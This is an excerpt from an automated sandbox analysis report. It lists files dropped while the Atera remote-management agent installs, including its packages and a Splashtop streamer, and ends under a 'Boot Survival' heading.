                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC6B.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9D9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4D50.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4BA8.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 442ad7.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 442adb.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 442ad5.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77D8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC499.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C16.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAB51.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E58.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBDF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC6B.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA1C8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7BC1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI46E3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CA1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9D9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4D50.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4BA8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI31B4.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC41B.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC4E9.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                Boot Survival

                                barindex
                                Installs Task Scheduler Managed Wrapper
